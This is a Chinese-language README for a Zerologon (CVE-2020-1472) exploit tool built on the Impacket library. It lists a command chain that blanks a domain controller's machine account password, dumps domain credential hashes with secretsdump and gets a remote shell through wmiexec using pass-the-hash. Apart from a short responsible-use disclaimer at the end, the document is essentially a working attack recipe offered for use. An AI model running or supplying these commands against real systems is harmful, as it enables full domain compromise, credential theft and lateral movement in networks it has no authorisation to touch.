针对CVE-2020-1472 (Zerologon) 的一个实用概念验证,使用Impacket库利用Netlogon漏洞并执行未授权的域控制器访问。
本仓库包含 Zerologon 漏洞利用的更新实现(2024 年),并结合 Impacket 工具来利用 CVE-2020-1472(Zerologon)。该利用工具针对 Windows Server 环境,用于操控机器账户密码并执行横向移动。
pip install -r requirements.txt
python3 set_empty_pw.py WIN-C9PAHHGJN91 192.168.40.145
python3 secretsdump.py -just-dc tancongmang/WIN-C9PAHHGJN91\[email protected]
python3 wmiexec.py tancongmang/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:579da618cfbfa85247acf1f800a280a4
python set_empty_pw.py WIN-C9PAHHGJN91 192.168.40.145
python secretsdump.py -just-dc "tancongmang/[email protected]"
python wmiexec.py tancongmang/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:579da618cfbfa85247acf1f800a280a4
WIN-C9PAHHGJN91 和 192.168.40.145 替换为目标的实际主机名和 IP 地址。请负责任地使用此工具。未经明确许可利用此工具攻击系统是违法且不道德的。作者不对因滥用或使用此工具造成的任何损失负责。